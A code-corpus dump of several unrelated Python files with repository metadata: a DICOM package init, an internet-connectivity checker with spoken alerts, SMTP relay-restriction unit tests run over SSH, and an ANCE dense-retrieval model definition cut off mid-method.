| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
75477013e812c2f14ff538b13497fe972170729d
| 123
|
py
|
Python
|
pfdicom_agesort/__init__.py
|
FNNDSC/pfdicom_agesort
|
25ff52dd4215b6c9e97bd3339de8a2c3311190f2
|
[
"MIT"
] | null | null | null |
pfdicom_agesort/__init__.py
|
FNNDSC/pfdicom_agesort
|
25ff52dd4215b6c9e97bd3339de8a2c3311190f2
|
[
"MIT"
] | 1
|
2020-01-06T20:32:51.000Z
|
2020-01-06T20:32:51.000Z
|
pfdicom_agesort/__init__.py
|
FNNDSC/pfdicom_agesort
|
25ff52dd4215b6c9e97bd3339de8a2c3311190f2
|
[
"MIT"
] | null | null | null |
try:
from .pfdicom_agesort import pfdicom_agesort
except:
from pfdicom_agesort import pfdicom_agesort
| 24.6
| 54
| 0.723577
| 14
| 123
| 6.071429
| 0.428571
| 0.658824
| 0.423529
| 0.564706
| 0.894118
| 0.894118
| 0
| 0
| 0
| 0
| 0
| 0
| 0.252033
| 123
| 4
| 55
| 30.75
| 0.923913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
755371a54534a6195823310f06fbd6c24bff977a
| 4,157
|
py
|
Python
|
checkinternet.py
|
digipodium/soil-health
|
bf42373d0e93950129854012de0b5cba849b5bf5
|
[
"MIT"
] | null | null | null |
checkinternet.py
|
digipodium/soil-health
|
bf42373d0e93950129854012de0b5cba849b5bf5
|
[
"MIT"
] | null | null | null |
checkinternet.py
|
digipodium/soil-health
|
bf42373d0e93950129854012de0b5cba849b5bf5
|
[
"MIT"
] | null | null | null |
def internet_on():
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,Testing Internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
global ledSwitch
global connected
global powerSwitch
try:
powerSwitch = 0
urllib.request.urlopen('http://216.58.207.206')
#urllib.urlopen('http://216.58.207.206', timeout=4)
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,We have an internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
ledSwitch = 1
Thread(target = led_green_alert).start()
try:
powerSwitch = 0
tts = gTTS(text="Code green! All communication systems are online and working within normal parameters." , lang='en')
tts.save("internet_on.mp3")
os.system("mpg321 -q internet_on.mp3")
except:
powerSwitch = 1
os.system("mpg321 -q internet_on_backup.mp3")
pass
connected = 1
ledSwitch = 0
time.sleep(2)
except:
powerSwitch = 1
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Error,No internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
ledSwitch = 1
Thread(target = led_red_alert).start()
try:
powerSwitch = 1
tts = gTTS(text="Alert! All communications are down. Alert! Systems running in emergency mode. Alert! Restoring communications, priority alpha." , lang='en')
tts.save("internet_off.mp3")
os.system("mpg321 -q internet_off.mp3")
os.system("mpg321 -q vader_breathe.mp3")
os.system("mpg321 -q vader_dont_fail.mp3")
except:
powerSwitch = 1
os.system("mpg321 -q internet_off_backup.mp3")
os.system("mpg321 -q vader_breathe.mp3")
os.system("mpg321 -q vader_dont_fail.mp3")
pass
connected = 0
ledSwitch = 0
time.sleep(2)
pass
def internet_on_thread():
global powerSwitch
global ledSwitch
global connected
while True:
time.sleep(180)
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,Testing Internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
if connected == 1:
try:
powerSwitch = 0
urllib.request.urlopen('http://216.58.207.206')
#urllib.urlopen('http://216.58.207.206', timeout=4)
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,We have an internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
connected = 1
except:
powerSwitch = 1
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Error,No internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
ledSwitch = 1
Thread(target = led_red_alert).start()
try:
powerSwitch = 1
tts = gTTS(text="Alert! All communications are down. Alert! Systems running in emergency mode. Alert! Restoring communications, priority alpha." , lang='en')
tts.save("internet_off.mp3")
os.system("mpg321 -q internet_off.mp3")
os.system("mpg321 -q vader_breathe.mp3")
os.system("mpg321 -q vader_dont_fail.mp3")
except:
powerSwitch = 1
os.system("mpg321 -q internet_off_backup.mp3")
os.system("mpg321 -q vader_breathe.mp3")
os.system("mpg321 -q vader_dont_fail.mp3")
pass
ledSwitch = 0
connected = 0
time.sleep(2)
pass
elif connected == 0:
try:
powerSwitch = 0
urllib.request.urlopen('http://216.58.192.142')
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Log,We have an internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
ledSwitch = 1
Thread(target = led_green_alert).start()
try:
powerSwitch = 0
tts = gTTS(text="Code green! All communication systems are online and working within normal parameters." , lang='en')
tts.save("internet_on.mp3")
os.system("mpg321 -q internet_on.mp3")
except:
powerSwitch = 1
os.system("mpg321 -q internet_on_backup.mp3")
pass
ledSwitch = 0
connected = 1
time.sleep(2)
except:
powerSwitch = 1
with open("error_log.csv", "a") as error_log:
error_log.write("\n{0},Error,No internet connection.".format(strftime("%Y-%m-%d %H:%M:%S")))
connected = 0
pass
| 28.472603
| 162
| 0.65095
| 615
| 4,157
| 4.297561
| 0.15935
| 0.072645
| 0.084752
| 0.090806
| 0.922058
| 0.889141
| 0.889141
| 0.889141
| 0.889141
| 0.872493
| 0
| 0.050686
| 0.193168
| 4,157
| 145
| 163
| 28.668966
| 0.737329
| 0.024056
| 0
| 0.9375
| 0
| 0.017857
| 0.385943
| 0.022195
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0.0625
| 0
| 0
| 0.017857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
f346a51ff228c45801708345dc8718617de6148b
| 13,140
|
py
|
Python
|
remote_testing/restrictions_external_network.py
|
punktDe/python-remote-testing
|
5e9b51937e0564a280fd7504065ee5a5693c1e03
|
[
"MIT"
] | null | null | null |
remote_testing/restrictions_external_network.py
|
punktDe/python-remote-testing
|
5e9b51937e0564a280fd7504065ee5a5693c1e03
|
[
"MIT"
] | null | null | null |
remote_testing/restrictions_external_network.py
|
punktDe/python-remote-testing
|
5e9b51937e0564a280fd7504065ee5a5693c1e03
|
[
"MIT"
] | null | null | null |
"""
MIT License
Copyright (c) 2020 Lars Liedtke
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import unittest
import rpyc
import plumbum as pb
import smtplib
from email.message import EmailMessage
from rpyc.utils.zerodeploy import DeployedServer
class ExternalNetworkRestrictions(unittest.TestCase):
def test_logged_out_smtp_expect_client_host_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="user",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com") as smtp:
with self.assertRaises(smtplib.SMTPRecipientsRefused) as e:
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("Client host rejected: Access denied", str(e.exception))
connection.close()
server.close()
machine.close()
def test_logged_out_smtps_expect_client_host_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="user",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
with self.assertRaises(smtplib.SMTPRecipientsRefused) as e:
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("Client host rejected: Access denied", str(e.exception))
connection.close()
server.close()
machine.close()
def test_logged_out_starttls_expect_client_host_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
with self.assertRaises(smtplib.SMTPRecipientsRefused) as e:
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("Client host rejected: Access denied", str(e.exception))
connection.close()
server.close()
machine.close()
def test_smtp_login_expect_reject(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com") as smtp:
with self.assertRaises(smtplib.SMTPNotSupportedError) as e:
smtp.login(user="user", password="test")
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("SMTP AUTH extension not supported by server", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_username_smtps_wrong_credentials_expect_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
with self.assertRaises(smtplib.SMTPAuthenticationError) as e:
smtp.login(user="user", password="test")
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
self.assertIn("Error: authentication failed", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_username_starttls_wrong_credentials_expect_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
with self.assertRaises(smtplib.SMTPAuthenticationError) as e:
smtp.login(user="user", password="test")
self.assertIn("Error: authentication failed", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_mailaddress_smtps_wrong_credentials_expect_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com",465) as smtp:
with self.assertRaises(smtplib.SMTPAuthenticationError) as e:
smtp.login(user="user@example.com", password="test")
self.assertIn("Error: authentication failed", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_mailaddress_starttls_wrong_credentials_expect_rejected(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
with self.assertRaises(smtplib.SMTPAuthenticationError) as e:
smtp.login(user="user@example.com", password="test")
self.assertIn("Error: authentication failed", str(e.exception), msg=str(e.exception))
connection.close()
server.close()
machine.close()
def test_login_username_smtps_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
smtp.login(user="user", password="supersecret")
connection.close()
server.close()
machine.close()
def test_login_username_starttls_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
smtp.login(user="user", password="supersecret")
connection.close()
server.close()
machine.close()
def test_login_mailaddress_smtps_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
smtp.login(user="user@example.com",
password="supersecret")
connection.close()
server.close()
machine.close()
def test_login_mailaddress_starttls_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP("mail.example.com", 587) as smtp:
smtp.starttls()
smtp.login(user="user@example.com", password="supersecret")
connection.close()
server.close()
machine.close()
def test_logged_in_smtps_non_fqdn_helo_hostname_expect_pass(self):
message = EmailMessage()
message["From"] = "sender@example.com"
message["To"] = "receiver@example.com"
message["Subject"] = "Test"
machine: pb.SshMachine = pb.SshMachine(host="remote.example.com", user="proserver",
keyfile="~/.ssh/id_rsa")
server = DeployedServer(machine)
connection: rpyc.Connection = server.classic_connect()
with connection.modules.smtplib.SMTP_SSL("mail.example.com", 465) as smtp:
smtp.ehlo("test_helo")
smtp.login(user="user", password="supersecret")
smtp.send_message(message,
from_addr="sender@example.com",
to_addrs="receiver@example.com")
connection.close()
server.close()
machine.close()
if __name__ == '__main__':
unittest.main()
| 41.320755
| 112
| 0.607839
| 1,369
| 13,140
| 5.731191
| 0.133674
| 0.086668
| 0.056334
| 0.049707
| 0.845526
| 0.845526
| 0.836095
| 0.836095
| 0.836095
| 0.83533
| 0
| 0.003902
| 0.278387
| 13,140
| 317
| 113
| 41.451104
| 0.82356
| 0.081279
| 0
| 0.877729
| 0
| 0
| 0.174155
| 0
| 0
| 0
| 0
| 0
| 0.069869
| 1
| 0.056769
| false
| 0.065502
| 0.026201
| 0
| 0.087336
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
f36e6331171c2ac092b0b840854293f30950f7ee
| 92
|
py
|
Python
|
allennlp_series/data/__init__.py
|
harsh19/TRUCE
|
fb9fae76f87d007d0590b21a4de3739c860ba516
|
[
"MIT"
] | 1
|
2021-11-16T02:03:28.000Z
|
2021-11-16T02:03:28.000Z
|
allennlp_series/data/__init__.py
|
harsh19/TRUCE
|
fb9fae76f87d007d0590b21a4de3739c860ba516
|
[
"MIT"
] | null | null | null |
allennlp_series/data/__init__.py
|
harsh19/TRUCE
|
fb9fae76f87d007d0590b21a4de3739c860ba516
|
[
"MIT"
] | null | null | null |
from allennlp_series.data.fields import *
from allennlp_series.data.dataset_reader import *
| 30.666667
| 49
| 0.847826
| 13
| 92
| 5.769231
| 0.615385
| 0.32
| 0.48
| 0.586667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 92
| 2
| 50
| 46
| 0.892857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
f38be4c4345a4c579b1851137280e7c51589544f
| 52,454
|
py
|
Python
|
model/models.py
|
playing-code/ANCE_test
|
80ae493af4e771274153ba5ce0d5b1793b1d7e11
|
[
"MIT"
] | null | null | null |
model/models.py
|
playing-code/ANCE_test
|
80ae493af4e771274153ba5ce0d5b1793b1d7e11
|
[
"MIT"
] | null | null | null |
model/models.py
|
playing-code/ANCE_test
|
80ae493af4e771274153ba5ce0d5b1793b1d7e11
|
[
"MIT"
] | null | null | null |
import sys
sys.path += ['../']
import torch
from torch import nn
from transformers import (
RobertaConfig,
RobertaModel,
RobertaForSequenceClassification,
RobertaTokenizer,
BertModel,
BertTokenizer,
BertConfig,
BertForSequenceClassification,
ElectraTokenizer,
ElectraModel,
ElectraForSequenceClassification,
ElectraConfig
)
import torch.nn.functional as F
from data.process_fn import triple_process_fn, triple2dual_process_fn
from torch import Tensor as T
from typing import Tuple
# from fairseq.modules import (
# LayerNorm,
# MultiheadAttention,
# PositionalEmbedding,
# TransformerSentenceEncoderLayer,
# )
from fairseq.modules import (
TransformerSentenceEncoder,
)
from transformers import ElectraTokenizer, ElectraModel
from transformers import AutoTokenizer, AutoModel
import torch.distributed as dist
def is_first_worker():
return not dist.is_available() or not dist.is_initialized() or dist.get_rank() == 0
class EmbeddingMixin:
"""
Mixin for common functions in most embedding models. Each model should define its own bert-like backbone and forward.
We inherit from RobertaModel to use from_pretrained
"""
def __init__(self, model_argobj):
if model_argobj is None:
self.use_mean = False
else:
self.use_mean = model_argobj.use_mean
print("Using mean:", self.use_mean)
def _init_weights(self, module):
""" Initialize the weights """
if isinstance(module, (nn.Linear, nn.Embedding, nn.Conv1d)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=0.02)
def masked_mean(self, t, mask):
s = torch.sum(t * mask.unsqueeze(-1).float(), axis=1)
d = mask.sum(axis=1, keepdim=True).float()
return s / d
def masked_mean_or_first(self, emb_all, mask):
# emb_all is a tuple from bert - sequence output, pooler
if isinstance(emb_all, tuple):
if self.use_mean:
return self.masked_mean(emb_all[0], mask)
else:
return emb_all[0][:, 0]
else:
#print('!!!',emb_all.shape)
if self.use_mean:
return self.masked_mean(emb_all, mask)
else:
#print('??? should be the first')
return emb_all[:, 0]
def query_emb(self, input_ids, attention_mask):
raise NotImplementedError("Please Implement this method")
def body_emb(self, input_ids, attention_mask):
raise NotImplementedError("Please Implement this method")
class NLL(EmbeddingMixin):
def forward(
self,
query_ids,
attention_mask_q,
input_ids_a=None,
attention_mask_a=None,
input_ids_b=None,
attention_mask_b=None,
is_query=True):
if input_ids_b is None and is_query:
return self.query_emb(query_ids, attention_mask_q)
elif input_ids_b is None:
return self.body_emb(query_ids, attention_mask_q)
q_embs = self.query_emb(query_ids, attention_mask_q)
a_embs = self.body_emb(input_ids_a, attention_mask_a)
b_embs = self.body_emb(input_ids_b, attention_mask_b)
#print('???',q_embs.shape,a_embs.shape)
logit_matrix = torch.cat([(q_embs * a_embs).sum(-1).unsqueeze(1),
(q_embs * b_embs).sum(-1).unsqueeze(1)], dim=1) # [B, 2]
#print('???',torch.cosine_similarity(q_embs,a_embs),torch.cosine_similarity(q_embs,a_embs).shape)
# logit_matrix = torch.cat([torch.cosine_similarity(q_embs,a_embs).unsqueeze(1),
# torch.cosine_similarity(q_embs,b_embs).unsqueeze(1)], dim=1)
#print('???',logit_matrix.shape,logit_matrix)
lsm = F.log_softmax(logit_matrix, dim=1)
# #print('???',lsm)
#assert 1==0
loss = -1.0 * lsm[:, 0]
acc=lsm[:,0]>lsm[:,1]
# score_a=(q_embs * a_embs).sum(-1)#.unsqueeze(1)
# score_b=(q_embs * b_embs).sum(-1)#.unsqueeze(1)
# target=torch.ones(score_a.shape).type_as(score_a)
# loss=torch.nn.MarginRankingLoss(margin=1.0)(score_a,score_b,target)
# return (loss.mean(),)
#q_embs_norm_avg=torch.sum(torch.norm(q_embs,dim=1))/q_embs.shape[0]
# a_embs_norm_avg=torch.sum(torch.norm(a_embs,dim=1))/a_embs.shape[0]
# b_embs_norm_avg=torch.sum(torch.norm(b_embs,dim=1))/b_embs.shape[0]
# cls_norm=(a_embs_norm_avg+b_embs_norm_avg)/2
# # print('???',torch.norm(q_embs,dim=1),torch.norm(a_embs,dim=1),torch.norm(b_embs,dim=1))
# # #print("???",query_ids,input_ids_a,input_ids_b)
# return (loss.mean(),cls_norm)
# cls_sim=torch.sum(torch.cosine_similarity(a_embs, b_embs, dim=1))/b_embs.shape[0]
#cls_sim=torch.sum(torch.cosine_similarity(a_embs, b_embs, dim=1))/b_embs.shape[0]
#print("???",F.mse_loss(a_embs, b_embs))
#cls_sim=torch.sum(F.mse_loss(a_embs, b_embs,reduction='none').sum(1))/b_embs.shape[0]
# cls_simb=torch.sum(torch.cosine_similarity(q_embs, b_embs, dim=1))/b_embs.shape[0]
# cls_sima=torch.sum(torch.cosine_similarity(q_embs, a_embs, dim=1))/b_embs.shape[0]
# cls_sima=(q_embs * a_embs).sum(-1)
# cls_simb=(q_embs * b_embs).sum(-1)
#cls_sim= torch.sum((b_embs * a_embs).sum(-1))/b_embs.shape[0]
# print('cls_sima',cls_sima,'cls_simb',cls_simb)
return (loss.mean(),acc.float().mean())
class NLL_concat(EmbeddingMixin):
def forward(
self,
# query_ids,
# attention_mask_q,
input_ids_a=None,
attention_mask_a=None,
input_ids_b=None,
attention_mask_b=None,
is_query=True):
# if input_ids_b is None and is_query:
# return self.query_emb(query_ids, attention_mask_q)
# elif input_ids_b is None:
# return self.body_emb(query_ids, attention_mask_q)
#q_embs = self.query_emb(query_ids, attention_mask_q)
a_embs = self.body_emb(input_ids_a, attention_mask_a)
b_embs = self.body_emb(input_ids_b, attention_mask_b)
#print('???',q_embs.shape,a_embs.shape)
# logit_matrix = torch.cat([(q_embs * a_embs).sum(-1).unsqueeze(1),
# (q_embs * b_embs).sum(-1).unsqueeze(1)], dim=1) # [B, 2]
logit_matrix = torch.cat([a_embs,
b_embs], dim=1) # [B, 2]
#print('???',logit_matrix.shape,logit_matrix)
lsm = F.log_softmax(logit_matrix, dim=1)
#print('???lsm',lsm)
#assert 1==0
loss = -1.0 * lsm[:, 0]
#print('???loss',loss)
#assert 1==0
return (loss.mean(),)
class RobertaDot_NLL_LN_fairseq_fast_concat(NLL_concat,nn.Module):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self, config, model_argobj=None):
nn.Module.__init__(self)
NLL_concat.__init__(self, model_argobj)
self.encoder=TransformerSentenceEncoder(
padding_idx=1,
vocab_size=32769,
num_encoder_layers=12,
embedding_dim=768,
ffn_embedding_dim=3072,
num_attention_heads=12,
dropout=0.1,
attention_dropout=0.1,
activation_dropout=0.0,
layerdrop=0.0,
max_seq_len=512,
num_segments=0,
encoder_normalize_before=True,
apply_bert_init=True,
activation_fn="gelu",
q_noise=0.0,
qn_block_size=8,
)
self.embeddingHead = nn.Linear(config.hidden_size, 1)
self.apply(self._init_weights)
def query_emb(self, input_ids, attention_mask):
#print('???input_ids',input_ids.shape)
outputs1, _ = self.encoder(input_ids)#[-1].transpose(0,1)
#print('???',outputs1)
outputs1=outputs1[-1].transpose(0,1)
full_emb = self.masked_mean_or_first(outputs1, attention_mask)
query1 = self.embeddingHead(full_emb)
# query_norm=torch.norm(full_emb,dim=1).unsqueeze(-1)
# query1=full_emb/query_norm
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
#tikenid pad
def from_pretrained(self, model_path):
model_dict = self.state_dict()
save_model=torch.load(model_path, map_location=lambda storage, loc: storage)
#print(save_model['model'].keys())
pretrained_dict= {}
# print('???model_dict',model_dict.keys(),len(model_dict.keys()))
# print('???save_model',save_model['model'].keys(),len(save_model['model'].keys()))
if 'model' in save_model.keys():
#save_model['model']
for name in save_model['model']:
if 'lm_head' not in name and 'encoder' in name and 'decode' not in name:
pretrained_dict['encoder'+name[24:]]=save_model['model'][name]
assert len(model_dict)-2==len(pretrained_dict), (len(model_dict),len(pretrained_dict),model_dict.keys(),pretrained_dict.keys())
#assert len(model_dict)==len(pretrained_dict)
else:
for name in save_model:
pretrained_dict[name[7:]]=save_model[name]
assert len(model_dict)==len(pretrained_dict)
#print(model_dict.keys())
print('load model.... ',len(model_dict),len(pretrained_dict))
print(pretrained_dict.keys())
model_dict.update(pretrained_dict)
self.load_state_dict(model_dict)
class NLL_MultiChunk(EmbeddingMixin):
def forward(
self,
query_ids,
attention_mask_q,
input_ids_a=None,
attention_mask_a=None,
input_ids_b=None,
attention_mask_b=None,
is_query=True):
if input_ids_b is None and is_query:
return self.query_emb(query_ids, attention_mask_q)
elif input_ids_b is None:
return self.body_emb(query_ids, attention_mask_q)
q_embs = self.query_emb(query_ids, attention_mask_q)
a_embs = self.body_emb(input_ids_a, attention_mask_a)
b_embs = self.body_emb(input_ids_b, attention_mask_b)
[batchS, full_length] = input_ids_a.size()
chunk_factor = full_length // self.base_len
# special handle of attention mask -----
attention_mask_body = attention_mask_a.reshape(
batchS, chunk_factor, -1)[:, :, 0] # [batchS, chunk_factor]
inverted_bias = ((1 - attention_mask_body) * (-9999)).float()
a12 = torch.matmul(
q_embs.unsqueeze(1), a_embs.transpose(
1, 2)) # [batch, 1, chunk_factor]
logits_a = (a12[:, 0, :] + inverted_bias).max(dim=-
1, keepdim=False).values # [batch]
# -------------------------------------
# special handle of attention mask -----
attention_mask_body = attention_mask_b.reshape(
batchS, chunk_factor, -1)[:, :, 0] # [batchS, chunk_factor]
inverted_bias = ((1 - attention_mask_body) * (-9999)).float()
a12 = torch.matmul(
q_embs.unsqueeze(1), b_embs.transpose(
1, 2)) # [batch, 1, chunk_factor]
logits_b = (a12[:, 0, :] + inverted_bias).max(dim=-
1, keepdim=False).values # [batch]
# -------------------------------------
logit_matrix = torch.cat(
[logits_a.unsqueeze(1), logits_b.unsqueeze(1)], dim=1) # [B, 2]
lsm = F.log_softmax(logit_matrix, dim=1)
loss = -1.0 * lsm[:, 0]
return (loss.mean(),)
class RobertaDot_NLL_LN(NLL, RobertaForSequenceClassification):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self, config, model_argobj=None):
NLL.__init__(self, model_argobj)
RobertaForSequenceClassification.__init__(self, config)
self.embeddingHead = nn.Linear(config.hidden_size, 768)
self.norm = nn.LayerNorm(768)
self.apply(self._init_weights)
def query_emb(self, input_ids, attention_mask):
outputs1 = self.roberta(input_ids=input_ids,
attention_mask=attention_mask)
full_emb = self.masked_mean_or_first(outputs1, attention_mask)
query1 = self.norm(self.embeddingHead(full_emb))
return query1
def body_emb(self, input_ids, attention_mask):
return self.query_emb(input_ids, attention_mask)
class ELECTRA_Dot_NLL_LN(NLL,ElectraForSequenceClassification):
"""None
Compress embedding to 200d, then computes NLL loss.
"""
def __init__(self,config, model_argobj=None):
NLL.__init__(self, model_argobj)
ElectraForSequenceClassification.__init__(self, config)
self.embeddingHead = nn.Linear(768, 768)
self.norm = nn.LayerNorm(768)
self.apply(self._init_weights)
# self.model= ElectraModel.from_pretrained('google/electra-base-discriminator')
# self.tokenizer = ElectraTokenizer.from_pretrained('google/electra-base-discriminator')
# for name, param in self.named_parameters():
# print(name,param.requires_grad)#=False
def query_emb(self, input_ids, attention_mask):
outputs1 = self.electra(input_ids=input_ids,
attention_mask=attention_mask)
